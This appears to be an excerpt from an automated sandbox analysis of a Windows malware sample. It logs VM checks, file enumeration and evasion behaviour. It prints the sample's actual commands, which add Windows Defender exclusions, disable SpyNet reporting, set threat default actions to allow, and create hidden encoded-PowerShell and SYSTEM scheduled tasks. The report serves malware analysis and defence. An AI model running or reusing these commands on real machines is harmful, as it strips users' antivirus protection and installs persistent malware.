Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1380Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4360Thread sleep count: 2646 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5840Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9714
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2646
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040553A FindFirstFileA,
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\__data__\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\
Source: file.exeBinary or memory string: .'KqEmU
Source: powershell.exe, 00000011.00000002.505600645.000002054AF20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000011.00000002.503838537.000002054AD5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000011.00000002.505600645.000002054AF20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:gzW
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041584A SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041585C SetUnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gupzuvmwb" /sc once /st 15:28:53 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gupzuvmwb" /sc once /st 15:28:53 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gUpzuvmWb" /SC once /ST 15:28:53 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gUpzuvmWb"
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gUpzuvmWb"
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:15:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe\" d8 /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
